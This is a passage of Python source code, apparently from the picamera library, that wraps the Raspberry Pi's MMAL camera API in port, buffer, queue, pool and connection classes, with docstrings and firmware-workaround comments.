],
'vc.null_sink:in:0': [
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
],
}
def __init__(self, port, opaque_subformat='OPQV'):
super(MMALPort, self).__init__(port)
self.opaque_subformat = opaque_subformat
self._pool = None
self._stopped = True
self._connection = None
def __repr__(self):
if self._port is not None:
return '<MMALPort "%s": format=MMAL_FOURCC(%r) buffers=%dx%d>' % (
self.name, mmal.FOURCC_str(self.format),
self.buffer_count, self.buffer_size)
else:
return '<MMALPort closed>'
def _get_opaque_subformat(self):
return self._opaque_subformat
def _set_opaque_subformat(self, value):
self._opaque_subformat = value
opaque_subformat = property(
_get_opaque_subformat, _set_opaque_subformat, doc="""\
Retrieves or sets the opaque sub-format that the port speaks. While
most formats (I420, RGBA, etc.) mean one thing, the opaque format is
special; different ports produce different sorts of data when
configured for OPQV format. This property stores a string which
uniquely identifies what the associated port means for OPQV format.
If the port does not support opaque format at all, set this property to
``None``.
:class:`MMALConnection` uses this information when negotiating formats
for a connection between two ports.
""")
def _get_format(self):
result = self._port[0].format[0].encoding
if FIX_RGB_BGR_ORDER:
return {
mmal.MMAL_ENCODING_RGB24: mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_BGR24: mmal.MMAL_ENCODING_RGB24,
}.get(result, result)
else:
return result
def _set_format(self, value):
if FIX_RGB_BGR_ORDER:
value = {
mmal.MMAL_ENCODING_RGB24: mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_BGR24: mmal.MMAL_ENCODING_RGB24,
}.get(value, value)
self._port[0].format[0].encoding = value
if value == mmal.MMAL_ENCODING_OPAQUE:
self._port[0].format[0].encoding_variant = mmal.MMAL_ENCODING_I420
format = property(_get_format, _set_format, doc="""\
Retrieves or sets the encoding format of the port. Setting this
attribute implicitly sets the encoding variant to a sensible value
(I420 in the case of OPAQUE).
After setting this attribute, call :meth:`commit` to make the changes
effective.
""")
@property
def supported_formats(self):
"""
Retrieves a sequence of supported encodings on this port.
"""
try:
mp = self.params[mmal.MMAL_PARAMETER_SUPPORTED_ENCODINGS]
except PiCameraMMALError as e:
if e.status in (mmal.MMAL_EINVAL, mmal.MMAL_ENOSYS):
# Workaround: old firmwares raise EINVAL or ENOSYS when various
# ports are queried for supported formats. The following is the
# correct sequence for old firmwares (note: swapped RGB24 and
# BGR24 order in still port) ... probably (vc.ril.camera:out:2
# is definitely right, the rest are largely guessed based on
# queries of later firmwares)
try:
return MMALPort._supported_formats_patch[self.name]
except KeyError:
raise e
else:
raise
else:
result = [
v for v in mp.encoding if v != 0
][:mp.hdr.size // ct.sizeof(ct.c_uint32)]
# Workaround: Fix incorrect result on MMALImageEncoder.outputs[0]
# from modern firmwares
if self.name == 'vc.ril.image_encode:out:0' and result == [
mmal.MMAL_ENCODING_MP2V, mmal.MMAL_ENCODING_MP2V,
mmal.MMAL_ENCODING_H264, mmal.MMAL_ENCODING_H264,
mmal.MMAL_ENCODING_VP7, mmal.MMAL_ENCODING_VP7,
mmal.MMAL_ENCODING_VP6, mmal.MMAL_ENCODING_VP6]:
return MMALPort._supported_formats_patch[self.name]
else:
return result
def _get_bitrate(self):
return self._port[0].format[0].bitrate
def _set_bitrate(self, value):
self._port[0].format[0].bitrate = value
bitrate = property(_get_bitrate, _set_bitrate, doc="""\
Retrieves or sets the bitrate limit for the port's format.
""")
def copy_from(self, source):
"""
Copies the port's :attr:`format` from the *source*
:class:`MMALControlPort`.
"""
if isinstance(source, MMALPythonPort):
mmal.mmal_format_copy(self._port[0].format, source._format)
else:
mmal.mmal_format_copy(self._port[0].format, source._port[0].format)
def commit(self):
"""
Commits the port's configuration and automatically updates the number
and size of associated buffers according to the recommendations of the
MMAL library. This is typically called after adjusting the port's
format and/or associated settings (like width and height for video
ports).
"""
mmal_check(
mmal.mmal_port_format_commit(self._port),
prefix="Format couldn't be set on port %s" % self.name)
# Workaround: Unfortunately, there is an upstream issue with the
# buffer_num_recommended which means it can't currently be used (see
# discussion in raspberrypi/userland#167). There's another upstream
# issue with buffer_num_min which means we need to guard against 0
# values...
self._port[0].buffer_num = max(1, self._port[0].buffer_num_min)
self._port[0].buffer_size = (
self._port[0].buffer_size_recommended
if self._port[0].buffer_size_recommended > 0 else
self._port[0].buffer_size_min)
@property
def pool(self):
"""
Returns the :class:`MMALPool` associated with the buffer, if any.
"""
return self._pool
def get_buffer(self, block=True, timeout=None):
"""
Returns a :class:`MMALBuffer` from the associated :attr:`pool`. *block*
and *timeout* act as they do in the corresponding
:meth:`MMALPool.get_buffer`.
"""
if not self.enabled:
raise PiCameraPortDisabled(
'cannot get buffer from disabled port %s' % self.name)
return self.pool.get_buffer(block, timeout)
def send_buffer(self, buf):
"""
Send :class:`MMALBuffer` *buf* to the port.
"""
if (
self.type == mmal.MMAL_PORT_TYPE_INPUT and
isinstance(self._connection, MMALPythonConnection) and
self._connection._callback is not None):
try:
modified_buf = self._connection._callback(self._connection, buf)
except:
buf.release()
raise
else:
if modified_buf is None:
buf.release()
return
else:
buf = modified_buf
try:
mmal_check(
mmal.mmal_port_send_buffer(self._port, buf._buf),
prefix="cannot send buffer to port %s" % self.name)
except PiCameraMMALError as e:
# If port is disabled, convert exception for convenience
if e.status == mmal.MMAL_EINVAL and not self.enabled:
raise PiCameraPortDisabled(
'cannot send buffer to disabled port %s' % self.name)
else:
raise
def flush(self):
"""
Flush the port.
"""
mmal_check(
mmal.mmal_port_flush(self._port),
prefix="Unable to flush port %s" % self.name)
def _get_buffer_count(self):
return self._port[0].buffer_num
def _set_buffer_count(self, value):
if value < 1:
raise PiCameraMMALError(mmal.MMAL_EINVAL, 'buffer count <1')
self._port[0].buffer_num = value
buffer_count = property(_get_buffer_count, _set_buffer_count, doc="""\
The number of buffers allocated (or to be allocated) to the port.
The ``mmalobj`` layer automatically configures this based on
recommendations from the MMAL library.
""")
def _get_buffer_size(self):
return self._port[0].buffer_size
def _set_buffer_size(self, value):
if value < 0:
raise PiCameraMMALError(mmal.MMAL_EINVAL, 'buffer size <0')
self._port[0].buffer_size = value
buffer_size = property(_get_buffer_size, _set_buffer_size, doc="""\
The size of buffers allocated (or to be allocated) to the port. The
size of buffers is typically dictated by the port's format. The
``mmalobj`` layer automatically configures this based on
recommendations from the MMAL library.
""")
def enable(self, callback=None):
"""
Enable the port with the specified callback function (this must be
``None`` for connected ports, and a callable for disconnected ports).
The callback function must accept two parameters which will be this
:class:`MMALControlPort` (or descendent) and an :class:`MMALBuffer`
instance. The callback should return ``True`` when processing is
complete and no further calls are expected (e.g. at frame-end for an
image encoder), and ``False`` otherwise.
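        For example, a hypothetical callback which writes each buffer to a
        file-like object and stops at the end of the frame (*output* and
        *encoder* are illustrative names, not part of this module)::
            def image_callback(port, buf):
                output.write(buf.data)
                return bool(buf.flags & mmal.MMAL_BUFFER_HEADER_FLAG_FRAME_END)
            encoder.outputs[0].enable(image_callback)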
"""
def wrapper(port, buf):
buf = MMALBuffer(buf)
try:
if not self._stopped and callback(self, buf):
self._stopped = True
finally:
buf.release()
try:
self._pool.send_buffer(block=False)
except PiCameraPortDisabled:
# The port was disabled, no point trying again
pass
# Workaround: There is a bug in the MJPEG encoder that causes a
# deadlock if the FIFO is full on shutdown. Increasing the encoder
# buffer size makes this less likely to happen. See
# raspberrypi/userland#208. Connecting the encoder component resets the
# output port's buffer size, hence why we correct this here, just
# before enabling the port.
if self._port[0].format[0].encoding == mmal.MMAL_ENCODING_MJPEG:
self._port[0].buffer_size = max(512 * 1024, self._port[0].buffer_size_recommended)
if callback:
assert self._stopped
assert self._pool is None
self._stopped = False
self._pool = MMALPortPool(self)
try:
self._wrapper = mmal.MMAL_PORT_BH_CB_T(wrapper)
mmal_check(
mmal.mmal_port_enable(self._port, self._wrapper),
prefix="Unable to enable port %s" % self.name)
# If this port is an output port, send it all the buffers
# in the pool. If it's an input port, don't bother: the user
# will presumably want to feed buffers to it manually
if self._port[0].type == mmal.MMAL_PORT_TYPE_OUTPUT:
self._pool.send_all_buffers(block=False)
except:
self._pool.close()
self._pool = None
self._stopped = True
raise
else:
super(MMALPort, self).enable()
def disable(self):
"""
Disable the port.
"""
self._stopped = True
super(MMALPort, self).disable()
if self._pool is not None:
self._pool.close()
self._pool = None
@property
def connection(self):
"""
If this port is connected to another, this property holds the
:class:`MMALConnection` or :class:`MMALPythonConnection` object which
represents that connection. If this port is not connected, this
property is ``None``.
"""
return self._connection
def connect(self, other, **options):
"""
Connect this port to the *other* :class:`MMALPort` (or
:class:`MMALPythonPort`). The type and configuration of the connection
will be automatically selected.
Various connection *options* can be specified as keyword arguments.
These will be passed onto the :class:`MMALConnection` or
:class:`MMALPythonConnection` constructor that is called (see those
classes for an explanation of the available options).
"""
# Always construct connections from the output end
if self.type != mmal.MMAL_PORT_TYPE_OUTPUT:
return other.connect(self, **options)
if other.type != mmal.MMAL_PORT_TYPE_INPUT:
raise PiCameraValueError(
'A connection can only be established between an output and '
'an input port')
if isinstance(other, MMALPythonPort):
return MMALPythonConnection(self, other, **options)
else:
return MMALConnection(self, other, **options)
def disconnect(self):
"""
Destroy the connection between this port and another port.
"""
if self.connection is not None:
self.connection.close()
class MMALVideoPort(MMALPort):
"""
Represents an MMAL port used to pass video data.
"""
__slots__ = ()
def __repr__(self):
if self._port is not None:
return (
'<MMALVideoPort "%s": format=MMAL_FOURCC("%s") buffers=%dx%d '
'frames=%s@%sfps colorspace=MMAL_FOURCC("%s")>' % (
self.name, mmal.FOURCC_str(self.format),
self._port[0].buffer_num, self._port[0].buffer_size,
self.framesize, self.framerate,
mmal.FOURCC_str(self.colorspace)))
else:
return '<MMALVideoPort closed>'
def _get_framesize(self):
return PiResolution(
self._port[0].format[0].es[0].video.crop.width,
self._port[0].format[0].es[0].video.crop.height,
)
def _set_framesize(self, value):
value = to_resolution(value)
video = self._port[0].format[0].es[0].video
video.width = bcm_host.VCOS_ALIGN_UP(value.width, 32)
video.height = bcm_host.VCOS_ALIGN_UP(value.height, 16)
video.crop.width = int(value.width)
video.crop.height = int(value.height)
framesize = property(_get_framesize, _set_framesize, doc="""\
Retrieves or sets the size of the port's video frames as a (width,
height) tuple. This attribute implicitly handles scaling the given
size up to the block size of the camera (32x16).
After setting this attribute, call :meth:`~MMALPort.commit` to make the
changes effective.
""")
def _get_framerate(self):
video = self._port[0].format[0].es[0].video
try:
return Fraction(
video.frame_rate.num,
video.frame_rate.den)
except ZeroDivisionError:
assert video.frame_rate.num == 0
return Fraction(0, 1)
def _set_framerate(self, value):
value = to_fraction(value)
video = self._port[0].format[0].es[0].video
video.frame_rate.num = value.numerator
video.frame_rate.den = value.denominator
framerate = property(_get_framerate, _set_framerate, doc="""\
Retrieves or sets the framerate of the port's video frames in fps.
After setting this attribute, call :meth:`~MMALPort.commit` to make the
changes effective.
""")
def _get_colorspace(self):
return self._port[0].format[0].es[0].video.color_space
def _set_colorspace(self, value):
self._port[0].format[0].es[0].video.color_space = value
colorspace = property(_get_colorspace, _set_colorspace, doc="""\
Retrieves or sets the color-space of the port's frames.
After setting this attribute, call :meth:`~MMALPort.commit` to make the
changes effective.
""")
class MMALAudioPort(MMALPort):
"""
Represents an MMAL port used to pass audio data.
"""
__slots__ = ()
def __repr__(self):
if self._port is not None:
return '<MMALAudioPort "%s": format=MMAL_FOURCC(%r) buffers=%dx%d>' % (
self.name, mmal.FOURCC_str(self.format),
self._port[0].buffer_num, self._port[0].buffer_size)
else:
return '<MMALAudioPort closed>'
class MMALSubPicturePort(MMALPort):
"""
Represents an MMAL port used to pass sub-picture (caption) data.
"""
__slots__ = ()
def __repr__(self):
if self._port is not None:
return '<MMALSubPicturePort "%s": format=MMAL_FOURCC(%r) buffers=%dx%d>' % (
self.name, mmal.FOURCC_str(self.format),
self._port[0].buffer_num, self._port[0].buffer_size)
else:
return '<MMALSubPicturePort closed>'
class MMALPortParams(object):
"""
Represents the parameters of an MMAL port. This class implements the
:attr:`MMALControlPort.params` attribute.
Internally, the class understands how to convert certain structures to more
common Python data-types. For example, parameters that expect an
MMAL_RATIONAL_T type will return and accept Python's
:class:`~fractions.Fraction` class (or any other numeric types), while
parameters that expect an MMAL_BOOL_T type will treat anything as a truthy
value. Parameters that expect the MMAL_PARAMETER_STRING_T structure will be
treated as plain strings, and likewise MMAL_PARAMETER_INT32_T and similar
structures will be treated as plain ints.
Parameters that expect more complex structures will return and expect
those structures verbatim.
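    For example, a rough sketch assuming *port* is the camera's control port
    (saturation is stored as a rational value)::
        port.params[mmal.MMAL_PARAMETER_SATURATION] = Fraction(1, 2)
        print(port.params[mmal.MMAL_PARAMETER_SATURATION])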
"""
__slots__ = ('_port',)
def __init__(self, port):
super(MMALPortParams, self).__init__()
self._port = port
def __getitem__(self, key):
dtype = PARAM_TYPES[key]
# Use the short-cut functions where possible (teeny bit faster if we
# get some C to do the structure wrapping for us)
func = {
mmal.MMAL_PARAMETER_RATIONAL_T: mmal.mmal_port_parameter_get_rational,
mmal.MMAL_PARAMETER_BOOLEAN_T: mmal.mmal_port_parameter_get_boolean,
mmal.MMAL_PARAMETER_INT32_T: mmal.mmal_port_parameter_get_int32,
mmal.MMAL_PARAMETER_INT64_T: mmal.mmal_port_parameter_get_int64,
mmal.MMAL_PARAMETER_UINT32_T: mmal.mmal_port_parameter_get_uint32,
mmal.MMAL_PARAMETER_UINT64_T: mmal.mmal_port_parameter_get_uint64,
}.get(dtype, mmal.mmal_port_parameter_get)
conv = {
mmal.MMAL_PARAMETER_RATIONAL_T: lambda v: Fraction(v.num, v.den),
mmal.MMAL_PARAMETER_BOOLEAN_T: lambda v: v.value != mmal.MMAL_FALSE,
mmal.MMAL_PARAMETER_INT32_T: lambda v: v.value,
mmal.MMAL_PARAMETER_INT64_T: lambda v: v.value,
mmal.MMAL_PARAMETER_UINT32_T: lambda v: v.value,
mmal.MMAL_PARAMETER_UINT64_T: lambda v: v.value,
mmal.MMAL_PARAMETER_STRING_T: lambda v: v.str.decode('ascii'),
}.get(dtype, lambda v: v)
if func == mmal.mmal_port_parameter_get:
result = dtype(
mmal.MMAL_PARAMETER_HEADER_T(key, ct.sizeof(dtype))
)
mmal_check(
func(self._port, result.hdr),
prefix="Failed to get parameter %d" % key)
else:
dtype = {
mmal.MMAL_PARAMETER_RATIONAL_T: mmal.MMAL_RATIONAL_T,
mmal.MMAL_PARAMETER_BOOLEAN_T: mmal.MMAL_BOOL_T,
mmal.MMAL_PARAMETER_INT32_T: ct.c_int32,
mmal.MMAL_PARAMETER_INT64_T: ct.c_int64,
mmal.MMAL_PARAMETER_UINT32_T: ct.c_uint32,
mmal.MMAL_PARAMETER_UINT64_T: ct.c_uint64,
}[dtype]
result = dtype()
mmal_check(
func(self._port, key, result),
prefix="Failed to get parameter %d" % key)
return conv(result)
def __setitem__(self, key, value):
dtype = PARAM_TYPES[key]
func = {
mmal.MMAL_PARAMETER_RATIONAL_T: mmal.mmal_port_parameter_set_rational,
mmal.MMAL_PARAMETER_BOOLEAN_T: mmal.mmal_port_parameter_set_boolean,
mmal.MMAL_PARAMETER_INT32_T: mmal.mmal_port_parameter_set_int32,
mmal.MMAL_PARAMETER_INT64_T: mmal.mmal_port_parameter_set_int64,
mmal.MMAL_PARAMETER_UINT32_T: mmal.mmal_port_parameter_set_uint32,
mmal.MMAL_PARAMETER_UINT64_T: mmal.mmal_port_parameter_set_uint64,
mmal.MMAL_PARAMETER_STRING_T: mmal.mmal_port_parameter_set_string,
}.get(dtype, mmal.mmal_port_parameter_set)
conv = {
mmal.MMAL_PARAMETER_RATIONAL_T: lambda v: to_rational(v),
mmal.MMAL_PARAMETER_BOOLEAN_T: lambda v: mmal.MMAL_TRUE if v else mmal.MMAL_FALSE,
mmal.MMAL_PARAMETER_STRING_T: lambda v: v.encode('ascii'),
}.get(dtype, lambda v: v)
if func == mmal.mmal_port_parameter_set:
mp = conv(value)
assert mp.hdr.id == key
assert mp.hdr.size >= ct.sizeof(dtype)
mmal_check(
func(self._port, mp.hdr),
prefix="Failed to set parameter %d to %r" % (key, value))
else:
mmal_check(
func(self._port, key, conv(value)),
prefix="Failed to set parameter %d to %r" % (key, value))
class MMALBuffer(object):
"""
Represents an MMAL buffer header. This is usually constructed from the
buffer header pointer and is largely supplied to make working with
the buffer's data a bit simpler. Using the buffer as a context manager
implicitly locks the buffer's memory and returns the :mod:`ctypes`
buffer object itself::
def callback(port, buf):
with buf as data:
# data is a ctypes uint8 array with size entries
print(len(data))
Alternatively you can use the :attr:`data` property directly, which returns
and modifies the buffer's data as a :class:`bytes` object (note this is
generally slower than using the buffer object unless you are simply
replacing the entire buffer)::
def callback(port, buf):
# the buffer contents as a byte-string
print(buf.data)
"""
__slots__ = ('_buf',)
def __init__(self, buf):
super(MMALBuffer, self).__init__()
self._buf = buf
def _get_command(self):
return self._buf[0].cmd
def _set_command(self, value):
self._buf[0].cmd = value
command = property(_get_command, _set_command, doc="""\
The command set in the buffer's meta-data. This is usually 0 for
buffers returned by an encoder; typically this is only used by buffers
sent to the callback of a control port.
""")
def _get_flags(self):
return self._buf[0].flags
def _set_flags(self, value):
self._buf[0].flags = value
flags = property(_get_flags, _set_flags, doc="""\
The flags set in the buffer's meta-data, returned as a bitmapped
integer. Typical flags include:
* ``MMAL_BUFFER_HEADER_FLAG_EOS`` -- end of stream
* ``MMAL_BUFFER_HEADER_FLAG_FRAME_START`` -- start of frame data
* ``MMAL_BUFFER_HEADER_FLAG_FRAME_END`` -- end of frame data
* ``MMAL_BUFFER_HEADER_FLAG_KEYFRAME`` -- frame is a key-frame
* ``MMAL_BUFFER_HEADER_FLAG_FRAME`` -- frame data
        * ``MMAL_BUFFER_HEADER_FLAG_CODECSIDEINFO`` -- motion estimation data
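        For example, to test whether a buffer ends a frame::
            if buf.flags & mmal.MMAL_BUFFER_HEADER_FLAG_FRAME_END:
                pass  # handle completed frame here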
""")
def _get_pts(self):
return self._buf[0].pts
def _set_pts(self, value):
self._buf[0].pts = value
pts = property(_get_pts, _set_pts, doc="""\
The presentation timestamp (PTS) of the buffer, as an integer number
of microseconds or ``MMAL_TIME_UNKNOWN``.
""")
def _get_dts(self):
return self._buf[0].dts
def _set_dts(self, value):
self._buf[0].dts = value
dts = property(_get_dts, _set_dts, doc="""\
The decoding timestamp (DTS) of the buffer, as an integer number of
microseconds or ``MMAL_TIME_UNKNOWN``.
""")
@property
def size(self):
"""
Returns the length of the buffer's data area in bytes. This will be
greater than or equal to :attr:`length` and is fixed in value.
"""
return self._buf[0].alloc_size
def _get_offset(self):
return self._buf[0].offset
def _set_offset(self, value):
assert 0 <= value <= self.size
self._buf[0].offset = value
self.length = min(self.size - self.offset, self.length)
offset = property(_get_offset, _set_offset, doc="""\
The offset from the start of the buffer at which the data actually
begins. Defaults to 0. If this is set to a value which would force the
current :attr:`length` off the end of the buffer's :attr:`size`, then
:attr:`length` will be decreased automatically.
""")
def _get_length(self):
return self._buf[0].length
def _set_length(self, value):
assert 0 <= value <= self.size - self.offset
self._buf[0].length = value
length = property(_get_length, _set_length, doc="""\
The length of data held in the buffer. Must be less than or equal to
the allocated size of data held in :attr:`size` minus the data
:attr:`offset`. This attribute can be used to effectively blank the
buffer by setting it to zero.
""")
def _get_data(self):
with self as buf:
return ct.string_at(
ct.byref(buf, self._buf[0].offset),
self._buf[0].length)
def _set_data(self, value):
value_len = buffer_bytes(value)
if value_len:
if value_len > self.size:
raise PiCameraValueError(
'data is too large for buffer (%d > %d)' % (
value_len, self.size))
bp = ct.c_uint8 * value_len
try:
sp = bp.from_buffer(value)
except TypeError:
sp = bp.from_buffer_copy(value)
with self as buf:
ct.memmove(buf, sp, value_len)
self._buf[0].offset = 0
self._buf[0].length = value_len
data = property(_get_data, _set_data, doc="""\
The data held in the buffer as a :class:`bytes` string. You can set
this attribute to modify the data in the buffer. Acceptable values
are anything that supports the buffer protocol, and which contains
:attr:`size` bytes or less. Setting this attribute implicitly modifies
the :attr:`length` attribute to the length of the specified value and
sets :attr:`offset` to zero.
.. note::
Accessing a buffer's data via this attribute is relatively slow
(as it copies the buffer's data to/from Python objects). See the
:class:`MMALBuffer` documentation for details of a faster (but
more complex) method.
""")
def replicate(self, source):
"""
Replicates the *source* :class:`MMALBuffer`. This copies all fields
from the *source* buffer, including the internal :attr:`data` pointer.
In other words, after replication this buffer and the *source* buffer
will share the same block of memory for *data*.
The *source* buffer will also be referenced internally by this buffer
and will only be recycled once this buffer is released.
.. note::
This is fundamentally different to the operation of the
:meth:`copy_from` method. It is much faster, but imposes the burden
that two buffers now share data (the *source* cannot be released
until the replicant has been released).
"""
mmal_check(
mmal.mmal_buffer_header_replicate(self._buf, source._buf),
prefix='unable to replicate buffer')
def copy_from(self, source):
"""
Copies all fields (including data) from the *source*
:class:`MMALBuffer`. This buffer must have sufficient :attr:`size` to
store :attr:`length` bytes from the *source* buffer. This method
implicitly sets :attr:`offset` to zero, and :attr:`length` to the
number of bytes copied.
.. note::
This is fundamentally different to the operation of the
:meth:`replicate` method. It is much slower, but afterward the
copied buffer is entirely independent of the *source*.
"""
assert self.size >= source.length
source_len = source._buf[0].length
if source_len:
with self as target_buf, source as source_buf:
ct.memmove(target_buf, ct.byref(source_buf, source.offset), source_len)
self._buf[0].offset = 0
self._buf[0].length = source_len
self.copy_meta(source)
def copy_meta(self, source):
"""
Copy meta-data from the *source* :class:`MMALBuffer`; specifically this
copies all buffer fields with the exception of :attr:`data`,
:attr:`length` and :attr:`offset`.
"""
self._buf[0].cmd = source._buf[0].cmd
self._buf[0].flags = source._buf[0].flags
self._buf[0].dts = source._buf[0].dts
self._buf[0].pts = source._buf[0].pts
self._buf[0].type[0] = source._buf[0].type[0]
def acquire(self):
"""
Acquire a reference to the buffer. This will prevent the buffer from
being recycled until :meth:`release` is called. This method can be
called multiple times in which case an equivalent number of calls
to :meth:`release` must be made before the buffer will actually be
released.
"""
mmal.mmal_buffer_header_acquire(self._buf)
def release(self):
"""
Release a reference to the buffer. This is the opposing call to
:meth:`acquire`. Once all references have been released, the buffer
will be recycled.
"""
mmal.mmal_buffer_header_release(self._buf)
def reset(self):
"""
Resets all buffer header fields to default values.
"""
mmal.mmal_buffer_header_reset(self._buf)
def __enter__(self):
mmal_check(
mmal.mmal_buffer_header_mem_lock(self._buf),
prefix='unable to lock buffer header memory')
return ct.cast(
self._buf[0].data,
ct.POINTER(ct.c_uint8 * self._buf[0].alloc_size)).contents
def __exit__(self, *exc):
mmal.mmal_buffer_header_mem_unlock(self._buf)
return False
def __repr__(self):
if self._buf is not None:
return '<MMALBuffer object: flags=%s command=%s length=%d>' % (
''.join((
'S' if self.flags & mmal.MMAL_BUFFER_HEADER_FLAG_FRAME_START else '_',
'E' if self.flags & mmal.MMAL_BUFFER_HEADER_FLAG_FRAME_END else '_',
'K' if self.flags & mmal.MMAL_BUFFER_HEADER_FLAG_KEYFRAME else '_',
'C' if self.flags & mmal.MMAL_BUFFER_HEADER_FLAG_CONFIG else '_',
'M' if self.flags & mmal.MMAL_BUFFER_HEADER_FLAG_CODECSIDEINFO else '_',
'X' if self.flags & mmal.MMAL_BUFFER_HEADER_FLAG_EOS else '_',
)), {
0: 'none',
mmal.MMAL_EVENT_ERROR: 'error',
mmal.MMAL_EVENT_FORMAT_CHANGED: 'format-change',
mmal.MMAL_EVENT_PARAMETER_CHANGED: 'param-change',
mmal.MMAL_EVENT_EOS: 'end-of-stream',
}[self.command], self.length)
else:
return '<MMALBuffer object: ???>'
class MMALQueue(object):
"""
Represents an MMAL buffer queue. Buffers can be added to the queue with the
:meth:`put` method, and retrieved from the queue (with optional wait
timeout) with the :meth:`get` method.
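    A minimal, purely illustrative sketch (*buf* is assumed to be an existing
    :class:`MMALBuffer`)::
        q = MMALQueue.create()
        try:
            q.put(buf)
            buf = q.get(timeout=1.0)
        finally:
            q.close()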
"""
__slots__ = ('_queue', '_created')
def __init__(self, queue):
self._created = False
self._queue = queue
@classmethod
def create(cls):
self = cls(mmal.mmal_queue_create())
self._created = True
return self
def close(self):
if self._created:
            mmal.mmal_queue_destroy(self._queue)
self._queue = None
def __len__(self):
return mmal.mmal_queue_length(self._queue)
def get(self, block=True, timeout=None):
"""
Get the next buffer from the queue. If *block* is ``True`` (the default)
and *timeout* is ``None`` (the default) then the method will block
until a buffer is available. Otherwise *timeout* is the maximum time to
wait (in seconds) for a buffer to become available. If a buffer is not
available before the timeout expires, the method returns ``None``.
Likewise, if *block* is ``False`` and no buffer is immediately
available then ``None`` is returned.
"""
if block and timeout is None:
buf = mmal.mmal_queue_wait(self._queue)
elif block and timeout is not None:
buf = mmal.mmal_queue_timedwait(self._queue, int(timeout * 1000))
else:
buf = mmal.mmal_queue_get(self._queue)
if buf:
return MMALBuffer(buf)
def put(self, buf):
"""
Place :class:`MMALBuffer` *buf* at the back of the queue.
"""
mmal.mmal_queue_put(self._queue, buf._buf)
def put_back(self, buf):
"""
Place :class:`MMALBuffer` *buf* at the front of the queue. This is
used when a buffer was removed from the queue but needs to be put
back at the front where it was originally taken from.
"""
mmal.mmal_queue_put_back(self._queue, buf._buf)
class MMALPool(object):
"""
Represents an MMAL pool containing :class:`MMALBuffer` objects. All active
ports are associated with a pool of buffers, and a queue. Instances can be
treated as a sequence of :class:`MMALBuffer` objects but this is only
recommended for debugging purposes; otherwise, use the :meth:`get_buffer`,
:meth:`send_buffer`, and :meth:`send_all_buffers` methods which work with
the encapsulated :class:`MMALQueue`.
"""
__slots__ = ('_pool', '_queue')
def __init__(self, pool):
self._pool = pool
super(MMALPool, self).__init__()
self._queue = MMALQueue(pool[0].queue)
def __len__(self):
return self._pool[0].headers_num
def __getitem__(self, index):
return MMALBuffer(self._pool[0].header[index])
@property
def queue(self):
"""
The :class:`MMALQueue` associated with the pool.
"""
return self._queue
def close(self):
if self._pool is not None:
mmal.mmal_pool_destroy(self._pool)
self._pool = None
def resize(self, new_count, new_size):
"""
Resizes the pool to contain *new_count* buffers with *new_size* bytes
allocated to each buffer.
*new_count* must be 1 or more (you cannot resize a pool to contain
no headers). However, *new_size* can be 0 which causes all payload
buffers to be released.
.. warning::
If the pool is associated with a port, the port must be disabled
when resizing the pool.
"""
mmal_check(
mmal.mmal_pool_resize(self._pool, new_count, new_size),
prefix='unable to resize pool')
def get_buffer(self, block=True, timeout=None):
"""
Get the next buffer from the pool's queue. See :meth:`MMALQueue.get`
for the meaning of the parameters.
"""
return self._queue.get(block, timeout)
def send_buffer(self, port, block=True, timeout=None):
"""
Get a buffer from the pool's queue and send it to *port*. *block* and
*timeout* act as they do in :meth:`get_buffer`. If no buffer is
        available (for the given values of *block* and *timeout*), a
        :exc:`~picamera.PiCameraMMALError` is raised.
"""
buf = self.get_buffer(block, timeout)
if buf is None:
raise PiCameraMMALError(mmal.MMAL_EAGAIN, 'no buffers available')
port.send_buffer(buf)
def send_all_buffers(self, port, block=True, timeout=None):
"""
Send all buffers from the queue to *port*. *block* and *timeout* act as
        they do in :meth:`get_buffer`. If no buffer is available (for the
        given values of *block* and *timeout*), a
        :exc:`~picamera.PiCameraMMALError` is raised.
"""
for i in range(len(self._queue)):
self.send_buffer(port, block, timeout)
class MMALPortPool(MMALPool):
"""
Construct an MMAL pool for the number and size of buffers required by
the :class:`MMALPort` *port*.
"""
__slots__ = ('_port',)
def __init__(self, port):
pool = mmal.mmal_port_pool_create(
port._port, port._port[0].buffer_num, port._port[0].buffer_size)
if not pool:
raise PiCameraMMALError(
mmal.MMAL_ENOSPC,
'failed to create buffer header pool for port %s' % port.name)
super(MMALPortPool, self).__init__(pool)
self._port = port
def close(self):
if self._pool is not None:
mmal.mmal_port_pool_destroy(self._port._port, self._pool)
self._port = None
self._pool = None
super(MMALPortPool, self).close()
@property
def port(self):
return self._port
def send_buffer(self, port=None, block=True, timeout=None):
"""
Get a buffer from the pool and send it to *port* (or the port the pool
is associated with by default). *block* and *timeout* act as they do in
:meth:`MMALPool.get_buffer`.
"""
if port is None:
port = self._port
super(MMALPortPool, self).send_buffer(port, block, timeout)
def send_all_buffers(self, port=None, block=True, timeout=None):
"""
Send all buffers from the pool to *port* (or the port the pool is
associated with by default). *block* and *timeout* act as they do in
:meth:`MMALPool.get_buffer`.
"""
if port is None:
port = self._port
super(MMALPortPool, self).send_all_buffers(port, block, timeout)
class MMALBaseConnection(MMALObject):
"""
Abstract base class for :class:`MMALConnection` and
:class:`MMALPythonConnection`. Handles weakrefs to the source and
target ports, and format negotiation. All other connection details are
handled by the descendent classes.
"""
__slots__ = ('_source', '_target')
default_formats = ()
compatible_opaque_formats = {
('OPQV-single', 'OPQV-single'),
('OPQV-dual', 'OPQV-dual'),
('OPQV-strips', 'OPQV-strips'),
('OPQV-dual', 'OPQV-single'),
('OPQV-single', 'OPQV-dual'), # recent firmwares permit this
}
def __init__(
self, source, target, formats=default_formats):
super(MMALBaseConnection, self).__init__()
if not isinstance(source, (MMALPort, MMALPythonPort)):
raise PiCameraValueError('source is not a port')
if not isinstance(target, (MMALPort, MMALPythonPort)):
raise PiCameraValueError('target is not a port')
if source.type != mmal.MMAL_PORT_TYPE_OUTPUT:
raise PiCameraValueError('source is not an output port')
if target.type != mmal.MMAL_PORT_TYPE_INPUT:
raise PiCameraValueError('target is not an input port')
if source.connection is not None:
raise PiCameraValueError('source port is already connected')
if target.connection is not None:
raise PiCameraValueError('target port is already connected')
if formats is None:
formats = ()
self._source = source
self._target = target
try:
iter(formats)
except TypeError:
formats = (formats,)
self._negotiate_format(formats)
source._connection = self
target._connection = self
# Descendents continue with connection implementation...
def close(self):
if self._source is not None:
self._source._connection = None
self._source = None
if self._target is not None:
self._target._connection = None
self._target = None
def _negotiate_format(self, formats):
